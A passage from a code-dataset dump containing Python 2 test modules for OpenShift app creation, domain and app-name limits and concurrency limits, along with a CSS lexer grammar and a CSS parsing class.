operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.error.message\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"OpenShift Perl app\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_h_create_ruby_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"rack\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if self.driver.find_element_by_css_selector(\"div.error.message\").is_displayed():\n # self.driver.refresh()\n #else:\n #baseutils.assert_contain_text_by_id(self,\"popular Ruby frameworks on OpenShift\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\") \n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"popular Ruby frameworks on OpenShift\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n \n def test_i_create_python_app(self):\n _appname=self.generate_app_name()\n # self.exist_app=_appname\n self.create_application(_appname,\"wsgi\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"deploy popular python frameworks\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n\n \n def test_j_create_php_app(self):\n _appname=self.generate_app_name()\n self.create_application(_appname,\"php\")\n time.sleep(20)\n #baseutils.is_element_displayed(self,By.ID,\"spinner\")\n #baseutils.assert_text_equal_by_id(self,\"Creating your app...\",\"spinner-text\")\n #time.sleep(5)\n #if baseutils.is_text_displayed (self,\"We're sorry, this operation has timed out. It is possible that it was succfully completed, but we are unable to verify it.\",\"div.message.error\"):\n # pass\n #else:\n #baseutils.assert_contain_text_by_id(self,\"OpenShift PHP app\",\"spinner-text\")\n #baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n self.assert_app_url(_appname)\n self.delete_application()\n '''\n def test_k_check_url_after_changedomain(self):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n #baseutils.click_element_by_xpath(self,\"//*[@id='domain_form_replacement']/a\")\n #baseutils.click_element_by_link_text(self,\"Express Console\")\n #time.sleep(5)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n _value=self.driver.find_element_by_id(\"express_domain_namespace\").get_attribute(\"value\")\n _newvalue=_value[:len(_value)-1]\n print \"======================\"\n print _newvalue\n #baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n #time.sleep(2)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n baseutils.input_by_id(self,\"express_domain_namespace\",_newvalue)\n baseutils.click_element_by_id(self,\"express_domain_submit\")\n time.sleep(10)\n baseutils.assert_element_present_by_link_text(self,_newvalue)\n time.sleep(20)\n# baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n #baseutils.assert_text_equal_by_css(self,\"Congratulations! You successfully updated your domain\",\"div.message.success\")\n self.assert_app_url_after_change(self.exist_app,_newvalue)\n \n\n def test_l_create_bsame_appname_w_exist(self):\n # _appname=self.generate_app_name()\n self.create_application(self.exist_app,\"php\")\n _domain=self.get_domain_name()\n _error=\"An application named \\'\"+self.exist_app+\"\\' in namespace \\'\"+_domain+\"\\' already exists\"\n baseutils.assert_text_equal_by_css(self,_error,\"div.error.message\")\n '''\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.5935605764389038, "alphanum_fraction": 0.6066287755966187, "avg_line_length": 24.751218795776367, "blob_id": "8fe62cfc4b3439a1cdb3752a4b147404598b01ea", "content_id": "6d846acdf5462ac0f5b9ecc10d8a184ea25af7af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5284, "license_type": "no_license", "max_line_length": 74, "num_lines": 205, "path": "/automation/open/lib/supports/XML/CSSgrammar.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# vim:ts=4:sw=4\n# \n#\n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nMODULE_DESCRIPTION\n\n\"\"\"\n\nimport sys\n\ndef _test(argv):\n\tpass # XXX\n\n\n# lexer\n\"\"\"\n\nunicode\t\t\\\\[0-9a-f]{1,4}\nlatin1\t\t[¡-ÿ]\nescape\t\t{unicode}|\\\\[ -~¡-ÿ]\nstringchar\t{escape}|{latin1}|[ !#$%&(-~]\nnmstrt\t\t[a-z]|{latin1}|{escape}\nnmchar\t\t[-a-z0-9]|{latin1}|{escape}\nident\t\t{nmstrt}{nmchar}*\nname\t\t{nmchar}+\nd\t\t[0-9]\nnotnm\t\t[^-a-z0-9\\\\]|{latin1}\nw\t\t[ \\t\\n]*\nnum\t\t{d}+|{d}*\\.{d}+\nstring\t\t\\\"({stringchar}|\\')*\\\"|\\'({stringchar}|\\\")*\\'\n\n%x COMMENT\n%s AFTER_IDENT\n\n%%\n\"/*\"\t\t\t\t{BEGIN(COMMENT);}\n<COMMENT>\"*/\"\t\t\t{BEGIN(0);}\n<COMMENT>\\n\t\t\t{/* ignore */}\n<COMMENT>.\t\t\t{/* ignore */}\n@import\t\t\t\t{BEGIN(0); return IMPORT_SYM;}\n\"!\"{w}important\t\t\t{BEGIN(0); return IMPORTANT_SYM;}\n{ident}\t\t\t\t{BEGIN(AFTER_IDENT); return IDENT;}\n{string}\t\t\t{BEGIN(0); return STRING;}\n\n{num}\t\t\t\t{BEGIN(0); return NUMBER;}\n{num}\"%\"\t\t\t{BEGIN(0); return PERCENTAGE;}\n{num}pt/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}mm/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}cm/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}pc/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}in/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}px/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}em/{notnm}\t\t\t{BEGIN(0); return EMS;}\n{num}ex/{notnm}\t\t\t{BEGIN(0); return EXS;}\n\n<AFTER_IDENT>\":\"link\t\t{return LINK_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"visited\t{return VISITED_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"active\t{return ACTIVE_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"first-line\t{return FIRST_LINE_AFTER_IDENT;}\n<AFTER_IDENT>\":\"first-letter\t{return FIRST_LETTER_AFTER_IDENT;}\n<AFTER_IDENT>\"#\"{name}\t\t{return HASH_AFTER_IDENT;}\n<AFTER_IDENT>\".\"{name}\t\t{return CLASS_AFTER_IDENT;}\n\n\":\"link\t\t\t\t{BEGIN(AFTER_IDENT); return LINK_PSCLASS;}\n\":\"visited\t\t\t{BEGIN(AFTER_IDENT); return VISITED_PSCLASS;}\n\":\"active\t\t\t{BEGIN(AFTER_IDENT); return ACTIVE_PSCLASS;}\n\":\"first-line\t\t\t{BEGIN(AFTER_IDENT); return FIRST_LINE;}\n\":\"first-letter\t\t\t{BEGIN(AFTER_IDENT); return FIRST_LETTER;}\n\"#\"{name}\t\t\t{BEGIN(AFTER_IDENT); return HASH;}\n\".\"{name}\t\t\t{BEGIN(AFTER_IDENT); return CLASS;}\n\nurl\\({w}{string}{w}\\)\t\t\t\t\t|\nurl\\({w}([^ \\n\\'\\\")]|\\\\\\ |\\\\\\'|\\\\\\\"|\\\\\\))+{w}\\)\t\t{BEGIN(0); return URL;}\nrgb\\({w}{num}%?{w}\\,{w}{num}%?{w}\\,{w}{num}%?{w}\\)\t{BEGIN(0); return RGB;}\n\n[-/+{};,#:]\t\t\t{BEGIN(0); return *yytext;}\n[ \\t]+\t\t\t\t{BEGIN(0); /* ignore whitespace */}\n\\n\t\t\t\t{BEGIN(0); /* ignore whitespace */}\n\\<\\!\\-\\-\t\t\t{BEGIN(0); return CDO;}\n\\-\\-\\>\t\t\t\t{BEGIN(0); return CDC;}\n.\t\t\t\t{fprintf(stderr, \"%d: Illegal character (%d)\\n\",\n\t\t\t\t lineno, *yytext);}\n\n\"\"\"\n\n\n# yacc\n\"\"\"\nstylesheet\n : [CDO|CDC]* [ import [CDO|CDC]* ]* [ ruleset [CDO|CDC]* ]*\n ;\nimport\n : IMPORT_SYM [STRING|URL] ';'\t\t/* E.g., @import url(fun.css); */\n ;\nunary_operator\n : '-' | '+'\n ;\noperator\n : '/' | ',' | /* empty */\n ;\nproperty\n : IDENT\n ;\nruleset\n : selector [ ',' selector ]*\n '{' declaration [ ';' declaration ]* '}'\n ;\nselector\n : simple_selector+ [ pseudo_element | solitary_pseudo_element ]?\n | solitary_pseudo_element\n ;\n\t/* An \"id\" is an ID that is attached to an element type\n\t** on its left, as in: P#p007\n\t** A \"solitary_id\" is an ID that is not so attached,\n\t** as in: #p007\n\t** Analogously for classes and pseudo-classes.\n\t*/\nsimple_selector\n : element_name id? class? pseudo_class?\t/* eg: H1.subject */\n | solitary_id class? pseudo_class?\t\t/* eg: #xyz33 */\n | solitary_class pseudo_class?\t\t\t/* eg: .author */\n | solitary_pseudo_class\t\t\t/* eg: :link */\n ;\nelement_name\n : IDENT\n ;\npseudo_class\t\t\t\t\t/* as in: A:link */\n : LINK_PSCLASS_AFTER_IDENT\n | VISITED_PSCLASS_AFTER_IDENT\n | ACTIVE_PSCLASS_AFTER_IDENT\n ;\nsolitary_pseudo_class\t\t\t\t/* as in: :link */\n : LINK_PSCLASS\n | VISITED_PSCLASS\n | ACTIVE_PSCLASS\n ;\nclass\t\t\t\t\t\t/* as in: P.note */\n : CLASS_AFTER_IDENT\n ;\nsolitary_class\t\t\t\t\t/* as in: .note */\n : CLASS\n ;\npseudo_element\t\t\t\t\t/* as in: P:first-line */\n : FIRST_LETTER_AFTER_IDENT\n | FIRST_LINE_AFTER_IDENT\n ;\nsolitary_pseudo_element\t\t\t\t/* as in: :first-line */\n : FIRST_LETTER\n | FIRST_LINE\n ;\n\t/* There is a constraint on the id and solitary_id that the\n\t** part after the \"#\" must be a valid HTML ID value;\n\t** e.g., \"#x77\" is OK, but \"#77\" is not.\n\t*/\nid\n : HASH_AFTER_IDENT\n ;\nsolitary_id\n : HASH\n ;\ndeclaration\n : property ':' expr prio? \n | /* empty */\t\t\t\t/* Prevents syntax errors... */\n ;\nprio\n : IMPORTANT_SYM\t \t\t/* !important */\n ;\nexpr\n : term [ operator term ]*\n ;\nterm\n : unary_operator?\n [ NUMBER | STRING | PERCENTAGE | LENGTH | EMS | EXS\n | IDENT | hexcolor | URL | RGB ]\n ;\n\t/* There is a constraint on the color that it must\n\t** have either 3 or 6 hex-digits (i.e., [0-9a-fA-F])\n\t** after the \"#\"; e.g., \"#000\" is OK, but \"#abcd\" is not.\n\t*/\nhexcolor\n : HASH | HASH_AFTER_IDENT\n ;\n\n\n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.5682187080383301, "alphanum_fraction": 0.5733622312545776, "avg_line_length": 33.839622497558594, "blob_id": "1ccc93cbb46268f44e64489458fc21936dd806d9", "content_id": "c4c6a7aaa139a134e8a9b02661e1008c38c75ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3694, "license_type": "no_license", "max_line_length": 182, "num_lines": 106, "path": "/automation/open/testmodules/RT/node/app_limit_per_user_concurrent_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n??\n??\n\"\"\"\n\nimport os\nimport string\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n except:\n self.app_limit_per_user = 3\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n\n def finalize(self):\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n if ret != 0:\n self.info(\"Failed to set max gears back to %d\" % (common.DEV_MAX_GEARS))\n else:\n self.info(\"Successfully set max gears back to %d\" % (common.DEV_MAX_GEARS))\n common.env_setup()\n\nclass AppLimitPerUserConcurentCreation(OpenShiftTest):\n def test_method(self):\n if self.config.options.run_mode == 'DEV':\n step = testcase.TestCaseStep(\"Set max gear to %d\" % (self.app_limit_per_user),\n common.set_max_gears,\n function_parameters = [self.user_email, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Max gear should be set successfully\")\n (ret, output) = step.run()\n if ret != 0:\n self.info(output)\n self.info(\"Failed to set max gears for user\")\n\n ret_list = []\n for i in range(2):\n common.env_setup() #clean_up\n step = testcase.TestCaseStep(\n \"Try %s: Create more apps than app_limit_per_user \"%(i + 1) +\n \"setting upon %s concurrent creation\" %(self.app_limit_per_user + 2),\n self.concrrent_creation_step,\n function_parameters=[1, self.app_limit_per_user + 2],\n expect_description=\"No more apps beyond limit should be created\")\n\n (ret_dict, output) = step.run()\n # print ret_dict\n if ret_dict.values().count(0) == self.app_limit_per_user:\n ret_list.append(0)\n # Init OSConf to clean these apps in next iterval\n OSConf.initial_conf()\n else:\n ret_list.append(1)\n # Init OSConf to clean these apps in next script\n OSConf.initial_conf()\n break\n\n\n #print ret_list\n if ret_list.count(1) > 0:\n print \"Upon %s concurrent creation, more apps than app_limit_per_user is created - [FAIL]\" %(self.app_limit_per_user + 2)\n return self.failed(\"%s failed\" % self.__class__.__name__)\n else:\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def concrrent_creation_step(self, start, end):\n command_list = []\n for i in range(start, end + 1):\n self.app_name = \"%s%s\" %(self.app_name_prefix, i)\n command_list.append(\"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n ret_dict = common.multi_subprocess(command_list)\n for i in ret_dict.keys():\n print \"Command {%s} return: %s\" %(i, ret_dict[i])\n\n return ret_dict\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserConcurentCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5701587200164795, "alphanum_fraction": 0.5965079069137573, "avg_line_length": 36.05882263183594, "blob_id": "8ab7ba4b24129f7319600852f6143c9ff5287385", "content_id": "79581d7becbe344dc6e30aeaea85c9e05932e6f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3150, "license_type": "no_license", "max_line_length": 202, "num_lines": 85, "path": "/automation/open/testmodules/RT/client/domain_app_name_length.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types['ruby']\n self.allowed_app_name = common.getRandomString(32) #'ab012345678901234567890123456789'\n self.forbidden_app_name= common.getRandomString(33) #'abc012345678901234567890123456789'\n self.forbidden_domain_name = common.getRandomString(17)\n self.allowed_domain_name = common.getRandomString(16)\n self.current_domain_name = common.get_domain_name(self.user_email, self.user_passwd)\n tcms_testcase_id=122309\n \tcommon.env_setup()\n self.steps_list = []\n\n def finalize(self):\n try:\n common.destroy_app(self.allowed_app_name)\n common.destroy_app(self.forbidden_app_name)\n os.system(\"rm -rf %s\"%self.allowed_app_name)\n os.system(\"rm -rf %s\"%self.forbidden_app_name)\n except:\n pass\n\n\nclass DomainAppNameLength(OpenShiftTest):\n def test_method(self):\n\n step = testcase.TestCaseStep(\"Create domain with namespace longer than 16\",\n \"rhc domain update %s %s -l %s -p '%s' %s\" %(self.current_domain_name, self.forbidden_domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with name size - 32\",\n common.create_app,\n function_parameters=[self.allowed_app_name, self.app_type, self.user_email, self.user_passwd, False],\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Create app with name longer than 32\",\n \"rhc app create %s %s -l %s -p '%s' %s\" %(self.forbidden_app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n\n case = testcase.TestCase(\"Create domain and app whose name size is longer than maximum value\",\n self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DomainAppNameLength)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5613134503364563, "alphanum_fraction": 0.5631044507026672, "avg_line_length": 33.6790885925293, "blob_id": "e76291af47328e9f5267ee69f038c226eada1802", "content_id": "517c7aa28906531362e4de122bb4066cd29ca33d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16750, "license_type": "no_license", "max_line_length": 77, "num_lines": 483, "path": "/automation/open/lib/supports/XML/css.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n\"\"\"\n\ncss.py\n-----------\n\nProvides a CSS class, which reads in a css specification in\nfile or string form and wraps it in a dictionary-like object.\nSee the class documentation for more info.\n\nCopyright 2000 by Matthew C. Gushee\n\nThe author hereby grants permission to use, redistribute, or\nmodify this program for any purpose, on condition that the\nabove copyright notice and this statement be retained without\nalteration. This program carries no warranty of any kind.\n\nPlease send comments and questions to <[email protected]>.\n\n\"\"\"\n\nimport string, re, copy, os\nfrom UserDict import UserDict\n\nclass CSS(UserDict):\n \"\"\"\n\n A dictionary-like wrapper for CSS style specifications.\n\n \n Usage:\n\n mycss = CSS('./mystyle.css')\n mycss = CSS(css_data)\n\n Instances may be created based on CSS files, or on data\n in CSS or Python dictionary form. See __init__ method\n documentation for details.\n\n\n Public methods:\n\n getspec Return style data for a particular context.\n\n setspec Define style data for a particular context.\n\n merge Assimilate data from another CSS instance.\n\n remove Remove specified data from the current instance.\n\n\n Additionally, the CSS class overloads the + and - operators to\n provide a convenient means of adding and subtracting data, e.g.:\n\n this_style = this_style + that_style\n\n (that_style may be a CSS class instance or a dictionary in the\n same form as CSS.data) If the two objects have any keys in common,\n the values in the right-hand object take precedence. Thus, the\n above operation may overwrite data in this_style. If you want to\n preserve all existing data while adding new data, simply reverse\n the order:\n \n this_style = that_style + this_style\n\n The following removes all data contained in that_style from\n this_style:\n\n this_style = this_style - that_style\n\n You can even empty all the data by doing this:\n \n this_style = this_style - this_style\n\n\n Parsed style data is stored as a dictionary in the form:\n\n {<selector>: {<prop-name>: <prop-value>, ...}, ...}\n \n <selector> is a string representing a CSS selector (an\n element name, class name, or ID), or a tuple of such strings.\n \n <prop-name> is a string representing a style property name.\n\n <prop-value> is a string representing a property value, or\n a list of such strings (as in the case of font families:\n ['Helvetica', 'Arial', 'Geneva', 'sans-serif']).\n\n Note that if a stylesheet contains a group of properties with\n multiple selectors, the CSS instance will have one key for each\n of these selectors. E.g.,\n\n .MainMenu, .WhatsNew, H5 { spam: eggs }\n\n ... becomes\n\n {'.MainMenu': {'spam': 'eggs'}, '.WhatsNew', {'spam': 'eggs'},\n H5 {'spam': 'eggs'}}\n\n Hierarchical selectors, on the other hand, are parsed into tuples.\n For example:\n\n .BodyText A { spam: eggs }\n\n ... becomes\n\n {('.BodyText', 'A'): {'spam': 'eggs'}}\n\n In this documentation, I use the term 'context' to refer to a\n single or hierarchical selector *in the form* used by the CSS\n class methods -- a string like 'BODY', or a sequence like\n ('TABLE', 'A'), or ['.Menu', 'UL']. Although the methods are\n currently written to accept context arguments in list form, I\n may at some point decide to restrict them to tuples.\n \n \n The current version of this class will probably fail to parse\n most stylesheets containing syntax errors. It makes no attempt\n to validate the stylesheet, however, so any data following CSS\n syntax will work.\n\n \"\"\"\n\n ## capture a specification group -- e.g., a group of style\n ## properties pertaining to a particular context\n specgroup = re.compile(r\"([^{}]+){([^{}]+)}\")\n ## weed out supposed property definitions that are empty\n ## or missing the required colon.\n bogus = re.compile(r\"^[^:]*$\")\n\n def __init__(self, datasrc, defaultcontext=None):\n \"\"\"\n Arguments:\n \n datasrc -- The data source for this instance. May be given in\n any of three forms: (1) the name of a CSS file, (2) a string\n containing style data in CSS syntax, or (3) a dictionary in\n the same form as self.data\n\n defaultcontext -- (OPTIONAL) The default context from which\n others inherit properties. If your stylesheet is for an\n ordinary web page, for example, you might use \"BODY\" as a\n default context. Must be present in the data source.\n\n \"\"\"\n UserDict.__init__(self)\n if type(datasrc) is type({}):\n self.data = datasrc\n else:\n if os.path.isfile(datasrc):\n cssdata = self._readin(datasrc)\n elif type(datasrc) is type(''):\n cssdata = datasrc\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(datasrc)\n self._parse(cssdata)\n self.defaultcontext = defaultcontext\n\n def __add__(self, other):\n if ((type(other) is type(self) and\n other.__class__ is self.__class__) or\n type(other) is type({})):\n return CSS(self.merge(other))\n elif os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.merge(temp))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __radd__(self, other):\n if os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.merge(temp, 1))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __sub__(self, other):\n if ((type(other) is type(self) and\n other.__class__ is self.__class__) or\n type(other) is type({})):\n return CSS(self.remove(other))\n elif os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.remove(temp))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __rsub__(self, other):\n if os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.remove(temp, 1))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def _error(self, strict, errmsg=''):\n if strict:\n raise RuntimeError, errmsg\n else:\n return 0\n\n def _readin(self, file):\n try:\n f = open(file, 'r')\n except IOError:\n print 'Unable to read file %s' % file\n css = f.read()\n f.close()\n return css\n\n def _parse(self, cssdata):\n propdict = {}\n while cssdata:\n spec = self.specgroup.match(cssdata)\n if spec is None:\n break\n selectors, stylegroup = spec.groups()\n ## Parse the styles first. That way, if there are\n ## multiple identifiers, we don't have to redo\n ## the styles for each one.\n for style in string.split(stylegroup, ';'):\n if self.bogus.match(style):\n break\n style = string.split(style, ':')\n prop = string.strip(style[0])\n val = string.split(style[1], ',')\n if len(val) < 2:\n propdict[prop] = string.strip(val[0])\n else:\n propdict[prop] = []\n for item in val:\n propdict[prop].append(string.strip(item))\n for sel in string.split(selectors, ','):\n sel = string.strip(sel)\n ## Hierarchical selector, e.g. .Body P\n hiersel = string.split(sel)\n if len(hiersel) > 1:\n sel = tuple(hiersel)\n if not self.has_key(sel):\n self[sel] = {}\n for prop, val in propdict.items():\n if not self[sel].has_key(prop):\n self[sel][prop] = val\n cssdata = cssdata[spec.end():]\n\n def getspec(self, context=None, strict=0, inherit=1,\n usecurrent=[], set={}):\n \"\"\"\n Return dictionary of style properties for a given context.\n\n Arguments (all optional):\n\n context -- (A dictionary key representing the context where\n this style spec will apply). If omitted, self.defaultcontext\n will be used.\n\n strict -- (boolean) If true, any properties having values of\n None, and any context names that do not exist in self.data,\n will cause errors. If false, values of None will be returned,\n and non-existent context names will be silently ignored.\n\n inherit -- (boolean) If true, the returned data will include\n inherited properties. If false, only properties explicitly\n defined for this context will be returned. If true and\n 'usecurrent' is empty , all properties applying to this\n context, whether explicitly defined or inherited, will be\n returned.\n\n usecurrent -- (list of property names) If any names are\n listed, only the listed properties will be returned, using\n inherited values for those not explicitly defined in this\n context.\n\n set -- (dictionary of property names and values) Sets\n properties to the specified values. This argument overrides\n existing values. If a 'set' argument is supplied, 'inherit'\n is false, and 'usecurrent' is omitted, the method will simply\n return the value of 'set'.\n\n \"\"\"\n spec = {}\n base = self.defaultcontext or ''\n if type(context) is type(''):\n context = [context]\n elif type(context) is type(()):\n if self.data.has_key(context):\n context = list(context) + [context]\n else:\n context = list(context)\n if inherit:\n if base and context[0] != base:\n context.insert(0, base)\n else:\n context = context[-1] \n if usecurrent or not inherit:\n inheritall = 0\n else:\n inheritall = 1\n context = context or base\n if usecurrent:\n ## Work down from current context to default\n context.reverse()\n found = []\n for prop in usecurrent:\n for layer in context:\n if self.data.has_key(layer):\n propdict = self.data[layer]\n if propdict.has_key(prop):\n spec[prop] = propdict[prop]\n found.append(prop)\n break\n elif strict:\n raise RuntimeError, \"Invalid selector: '%s'.\" % layer\n for prop in usecurrent:\n if prop not in found:\n spec[prop] = None\n if inheritall:\n ## Work up from default context\n for layer in context:\n if self.data.has_key(layer):\n for prop in self.data[layer].keys():\n spec[prop] = self.data[layer][prop]\n elif strict:\n raise RuntimeError, \"Invalid selector: '%s'.\" % layer\n if set:\n for prop in set.keys():\n spec[prop] = set[prop]\n if strict:\n for prop in spec.keys():\n if spec[prop] is None:\n raise RuntimeError, \"Property not found: '%s'.\" % prop\n return spec \n \n def setspec(self, context=None, strict=0, inherit=1,\n keeponly=[], set={}):\n \"\"\"\n Define style properties for a particular context.\n\n [ DON'T USE THIS YET! Something is screwy in the way this\n method calls self.getspec(). To be fixed soon. ]\n\n Arguments (all optional):\n\n context -- (A dictionary key representing the context where\n this style spec will apply). The key may, but need not, be\n present in the instance data. If omitted, self.defaultcontext\n will be used.\n\n strict -- (boolean) See getspec documentation.\n\n inherit -- (boolean) If true, any existing properties applying\n to the given context, but not specified in 'set', will be\n retained, including inherited properties. If false, the new\n settings will include only the properties explicitly defined\n for the context.\n\n keeponly -- (list of property names) If empty, all existing\n properties will be retained. If any property names are listed,\n only the properties listed here or in 'set' will be kept; all\n others will be removed.\n\n set -- (dictionary of property names and values) Sets\n properties to the specified values. This argument overrides\n inherited values.\n \n \"\"\"\n if context is None:\n try:\n ## MakeError is undefined, so raises exception\n context = self.defaultcontext | MakeError\n except:\n raise RuntimeError, 'No context for style spec.'\n if not self.data.has_key(context):\n self.data[context] = {}\n if keeponly:\n newspec = self.getspec(context, strict,\n usecurrent=keeponly, set=set)\n elif inherit:\n newspec = self.getspec(context, strict, set=set)\n elif set:\n newspec = set\n else:\n newspec = self.getspec(context)\n for prop in set.keys():\n self.data[context] = newspec\n\n\n def merge(self, cssobj, selfish=0):\n \"\"\"\n Assimilate data from another CSS instance.\n\n Arguments:\n\n cssobj -- a CSS class instance\n\n selfish -- (optional, boolean) In case of conflicts, this\n argument specifies whether new or existing data takes\n precedence. If false, new data (specified in 'cssobj')\n will take precedence; if true, all existing data will\n be preserved.\n\n \"\"\"\n if selfish:\n ## Dunno why I was getting errors with this ...\n ## result = copy.deepcopy(cssobj)\n result = {}\n for k in cssobj.keys():\n result[k] = copy.copy(cssobj[k])\n newdata = self.data\n else:\n ## result = copy.deepcopy(self.data)\n result = {}\n for k in self.data.keys():\n result[k] = copy.copy(self.data[k]) \n newdata = 